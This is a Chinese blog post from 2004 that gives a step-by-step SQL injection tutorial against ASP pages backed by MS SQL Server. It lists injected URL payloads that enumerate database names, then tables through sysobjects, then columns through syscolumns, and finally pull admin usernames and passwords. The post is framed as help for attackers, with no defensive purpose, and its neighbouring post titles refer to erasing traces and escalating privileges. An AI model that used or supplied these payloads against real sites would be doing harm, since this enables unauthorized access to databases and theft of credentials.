- 用户操作
- [留言] [发消息] [加为好友]
- 订阅我的博客
-
-
-
-
- aanother的公告
- <div align="center"> <img border="0" src="http://blog.csdn.net/images/blog_csdn_net/aanother/26337/o_NickLwt.gif" > </div><SCRIPT language=javascript> document.getElementById("Header1_HeaderTitle").outerHTML="<table width=100%><tr><td width=40> <img src='http://blog.csdn.net/images/blog_csdn_net/aanother/26919/o_gwico100.gif' border='0' > </td><td align='left'><a href='http://blog.csdn.net/aanother/' style='color:#ffffff;font-size:9pt'><b><font size=3 >Another's story!</b></a></td><td align=right><img src = 'http://blog.csdn.net/images/blog_csdn_net/aanother/26919/o_logo.gif' border=0 alt='13578.tk 欢迎链接!'> </td></tr></table>"; </SCRIPT> <script language="javascript"> document.getElementById("leftmenu").children(0).innerHTML="<table><tr><td width=40> <img src='http://blog.csdn.net/images/blog_csdn_net/aanother/26919/o_1.GIF' width=30 height=30> </td><td><a href='javascript:document.getElementById(\"leftmenu\").children(1).style.display==\"none\"?document.getElementById(\"leftmenu\").children(1).style.display=\"\":document.getElementById(\"leftmenu\").children(1).style.display=\"none\";void(0)'><font color=#CC0000>博客站</font></a></td></tr></table>"; document.getElementById("leftmenu").children(1).style.display="none"; function window.onload() { document.getElementById("leftmenu").children(3).style.display="none"; //document.getElementById("leftmenu").children(5).style.display="none"; //document.getElementById("leftmenu").children(4).style.display="none"; document.getElementById("leftmenu").children(7).style.display="none"; document.getElementById("leftmenu").children(9).style.display="none"; document.getElementById("leftmenu").children(11).style.display="none"; document.getElementById("leftmenu").children(13).style.display="none"; document.getElementById("leftmenu").children(15).style.display="none"; document.getElementById("leftmenu").children(2).innerHTML="<table><tr><td width=40> <img src='http://blog.csdn.net/images/blog_csdn_net/aanother/26919/o_2.GIF' width='25'> </td><td><a href='javascript:document.getElementById(\"leftmenu\").children(3).style.display==\"none\"?document.getElementById(\"leftmenu\").children(3).style.display=\"\":document.getElementById(\"leftmenu\").children(3).style.display=\"none\";void(0)'><font color=#0000FF>关于我</font></a></td></tr></table>"; document.getElementById("leftmenu").children(6).innerHTML="<table><tr><td width=40> <img src='http://blog.csdn.net/images/blog_csdn_net/aanother/26919/o_3.GIF' width='25'> </td><td><a href='javascript:document.getElementById(\"leftmenu\").children(7).style.display==\"none\"?document.getElementById(\"leftmenu\").children(7).style.display=\"\":document.getElementById(\"leftmenu\").children(7).style.display=\"none\";void(0)'><font color=#0000FF>流水帐</font></a></td></tr></table>"; document.getElementById("leftmenu").children(8).innerHTML="<table><tr><td width=40> <img src='http://blog.csdn.net/images/blog_csdn_net/aanother/26919/o_4.GIF' width='25'> </td><td><a href='javascript:document.getElementById(\"leftmenu\").children(9).style.display==\"none\"?document.getElementById(\"leftmenu\").children(9).style.display=\"\":document.getElementById(\"leftmenu\").children(9).style.display=\"none\";void(0)'><font color=#0000FF>保宝箱</font></a></td></tr></table>"; document.getElementById("leftmenu").children(10).innerHTML="<table><tr><td width=40><img src='http://blog.csdn.net/images/blog_csdn_net/aanother/26919/o_5.GIF'> </td><td><a href='javascript:document.getElementById(\"leftmenu\").children(11).style.display==\"none\"?document.getElementById(\"leftmenu\").children(11).style.display=\"\":document.getElementById(\"leftmenu\").children(11).style.display=\"none\";void(0)'><font color=#0000FF>笨笨图</font></a></td></tr></table>"; document.getElementById("leftmenu").children(12).innerHTML="<table><tr><td width=40><img src='http://blog.csdn.net/images/blog_csdn_net/aanother/26919/o_6.GIF'> </td><td><a href='javascript:document.getElementById(\"leftmenu\").children(13).style.display==\"none\"?document.getElementById(\"leftmenu\").children(13).style.display=\"\":document.getElementById(\"leftmenu\").children(13).style.display=\"none\";void(0)'><font color=#0000FF>月导航</font></a></td></tr></table>"; document.getElementById("leftmenu").children(14).innerHTML="<table><tr><td width=40> <img src='http://blog.csdn.net/images/blog_csdn_net/aanother/26919/o_7.GIF' width='25'> </td><td><a href='javascript:document.getElementById(\"leftmenu\").children(15).style.display==\"none\"?document.getElementById(\"leftmenu\").children(15).style.display=\"\":document.getElementById(\"leftmenu\").children(15).style.display=\"none\";void(0)'><font color=#CC0000>站站通</font></a></td></tr></table>"; var els=document.getElementById("main").document.getElementsByTagName("DIV"); var j=0; for(i=0;i<els.length;i++) { if (els[i].className == 'post') { var sHtml = els[i].innerHTML ; var iNum = Math.random() * 1000 ; iNum = parseInt(iNum) % 3 + 1; var sUrl = '<img src = "http://blog.csdn.net/images/blog_csdn_net/aanother/26919/title.gif" border="0" > <A' sUrl = sUrl.replace('title','o_title' + iNum); sHtml = sHtml.replace('<A',sUrl); els[i].innerHTML = sHtml ; } } } </script>
- 文章分类
- 站站通
- Delphi盒子
- ecai的专栏
- 资源网
- 存档
SQL注入之"全暴"
收藏
SQL INJECTION 灵活多变,注入的语句不一,下面只提供暴库的一般
步骤,希望能对你有帮助。
1:暴出所有库名.
http://www.***.com/***.asp?id=1 and 0<>(select count(*)
from master.dbo.sysdatabases where name>1 and dbid=6)
依次提交 dbid = 7,8,9.... 得到更多的数据库名
2:暴出库中的表
假设存在一个bbs的数据库,提交下面的语句:
http://www.***.com/jump.asp?id=1 and 0<>(select top 1 name
from bbs.dbo.sysobjects where xtype='U')
来得到一个表 假设为 admin
提交:
http://www.***.com/jump.asp?id=1 and 0<>(select top 1 name
from bbs.dbo.sysobjects where xtype='U' and name not in
('Admin'))
来得到其他的表。
3:暴出表中的字段
提交:
http://www.***.com/***.asp?id=1 and 0<>(select count(*)
from bbs.dbo.sysobjects where xtype='U' and name='admin'
and uid>(str(id)))
得到UID的数值假设为18779569 uid=id
提交:
http://www.***.com/***.asp?id=1 and 0<>(select top 1 name
from bbs.dbo.syscolumns where id=18779569)
得到一个admin的一个字段,假设为 user_id
4:暴出用户名和密码等
假设存在user_id username ,password 等字段,提交:
http://www.***.com/***.asp?id=1 and 0<(select user_id from
BBS.dbo.admin where username>1)
可以得到用户名
依次可以得到密码。。。。。
发表于 @ 2004年07月28日 14:02:00 | 评论( loading... ) | 举报| 收藏
旧一篇:黑客安全离开之"擦PP" | 新一篇:Guest权限提升方法总结
- 查看最新精华文章 请访问博客首页相关文章
-
- 发表评论
-
- 表 情:
-
- 评论内容:
- 用 户 名: